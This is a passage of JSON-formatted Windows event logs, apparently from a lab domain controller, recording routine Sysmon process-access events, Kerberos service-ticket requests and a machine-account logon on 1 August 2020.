C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.265","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2648,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.265\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.265","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2649,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.265\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31375|C:\\Windows\\system32\\lsasrv.dll+2f20b|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.265","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31375|C:\\Windows\\system32\\lsasrv.dll+2f20b|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220396,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-881393$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{557CDD29-3D05-7C13-A843-635BED52B3AC}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-881393$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{557CDD29-3D05-7C13-A843-635BED52B3AC}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220397,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-881393$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{557CDD29-3D05-7C13-A843-635BED52B3AC}\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x60810010\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-881393$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x60810010","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{557CDD29-3D05-7C13-A843-635BED52B3AC}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220398,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4B795\r\n\r\nPrivileges:\t\tSeAuditPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeAssignPrimaryTokenPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-1008","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4b795","PrivilegeList":"SeAuditPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeAssignPrimaryTokenPrivilege","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220399,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tDelegation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x4B795\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{AFF56F56-76BC-49CD-114E-CD569E1577C2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x4b795","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{AFF56F56-76BC-49CD-114E-CD569E1577C2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1840","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2650,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.437\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.437","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2651,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.437\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.437","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2652,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.437\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 